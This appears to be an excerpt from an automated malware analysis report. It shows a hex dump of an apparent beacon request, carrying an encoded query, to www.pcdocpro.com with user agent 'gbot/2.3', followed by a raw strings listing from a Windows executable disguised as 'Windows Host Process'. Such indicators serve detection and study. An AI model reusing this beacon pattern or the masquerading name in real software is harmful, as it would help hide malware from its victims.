0x00000280 (00640)   79614e6c 33662532 46496a64 424f6e4f   yaNl3f%2FIjdBOnO
0x00000290 (00656)   77316142 324d636c 5172356b 55685179   w1aB2MclQr5kUhQy
0x000002a0 (00672)   7975306c 36795348 656d5570 364b4737   yu0l6ySHemUp6KG7
0x000002b0 (00688)   52653361 5a566a70 37484f6a 556d7a76   Re3aZVjp7HOjUmzv
0x000002c0 (00704)   2532467a 65315779 58783262 41474453   %2Fze1WyXx2bAGDS
0x000002d0 (00720)   4155735a 684d7846 20485454 502f312e   AUsZhMxF HTTP/1.
0x000002e0 (00736)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x000002f0 (00752)   6c6f7365 0d0a486f 73743a20 7777772e   lose..Host: www.
0x00000300 (00768)   7063646f 6370726f 2e636f6d 0d0a4163   pcdocpro.com..Ac
0x00000310 (00784)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x00000320 (00800)   4167656e 743a2067 626f742f 322e330d   Agent: gbot/2.3.
0x00000330 (00816)   0a0d0a                                ...


Strings

040904b0
1147
FileDescription
&Main
MS Sans Serif
PrivateBuild
S&top
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
Windows Host Process
^1\5yc
1m\u+TQ
-2Ns}X
3Ub9yu
}4woN:lue
()5;>i
@		)7%P
80T	:I
)8@Koc$
9<g=CdG
a9`EFT
A|CW?V
B4wY>>wz	
BeginPaint
^c^8\U
CancelWaitableTimer
CertCloseStore
CertEnumSystemStoreLocation
CertFindCertificateInStore
CertFreeCertificateContext
CertGetNameStringW
@&cmJ"
CoCreateInstance
CoInitialize
CoUninitialize
CreateFontIndirectW
CreateSolidBrush
CreateStdAccessibleObject
CRYPT32.dll
CryptDecodeObject
CryptMsgClose
CryptMsgGetParam
CryptQueryObject
-CS2nI
CSTS|g
@.data
DefWindowProcW
DeleteCriticalSection
DeleteObject
DestroyWindow
;Dq:HZ
DsO5$*
EndPaint
ExitProcess
FreeEnvironmentStringsA
FreeEnvironmentStringsW
fZJ9r10[
GDI32.dll
GetACP
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentThreadId
GetDeviceCaps
GetDlgItem
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileAttributesW
GetFileType
GetModuleFileNameA
GetModuleHandleA
GetObjectW
GetOEMCP
GetParent
>GetPh`5@
GetProcessHeap
GetProcessVersion
GetStartupInfoA
GetStdHandle
GetTickCount
GetVersionExA
GetWindowDC
GetWindowLongW
GMA^!A;m(F
GvipAj
gvyZ,5
<<<h77j0
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
h_hUf@
HJ.Ru?F
hLibrhOn@
hLocah
hShSv@
ht#Uex`
hualPh?^@
i< 95K
InterlockedIncrement
"-I=oo
iQ-2[;
IsDebuggerPresent
IsValidCodePage
+iTj@h
*I/Wsp
*j?7=yg
jph/,@
kcKx0n
KERNEL32.dll
)	kIvt
^k}r_42-
lh"8lKW
LoadBitmapW
LoadIconW
LoadLibraryW
LoadStringW
m7<jRc
MessageBoxW
N2Nj-P4t"
n]{_q?
n.Sx9B
`?nXy{
OiTL18
ole32.dll
OLEACC.dll
O[MtYN
o:NWIa
ooo,-p
oooR+2e
^O|QI-
p89T-_
p,f,9X
PostMessageW
p)Q/RS
pWOy3m
QueryPerformanceCounter
]qz-u0&
R1h+E$
RaiseException
`.rdata
ReadFile
ReleaseDC
rhhLocahq
#R{L5f
RtlUnwind
:R.zv[g
S?3x`4
@S6T%Q
SendMessageW
SetBkColor
SetBkMode
SetDlgItemTextW
SetHandleCount
SetLastError
SetUnhandledExceptionFilter
SetWindowLongW
SetWindowPos
SHBrowseForFolderW
SHELL32.dll
ShellExecuteW
SHGetPathFromIDListW
SHGetSpecialFolderPathW
SjH(y'
_sza!W
TerminateProcess
!This program cannot be run in DOS mode.
ThlFre
Throte
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
>>tq_ 
TQh#j@
tYj5Oe
ucNY'6
.ulrm-7
UnhandledExceptionFilter
u [P7a
USER32.dll
v04=?@Fa
;v7,\9	
VirtualFree
v>X<XM
w%75wJ
w<cBRk
WideCharToMultiByte
wkWfw]W
wM4;7e
w'v7w0
X_?2h}
}X3jIu
~]X|3K
.@xg*p
YPDAOX~
	z3-x_
zcc7Y7
zhhlAll
"!Z`-"T
zTccYZA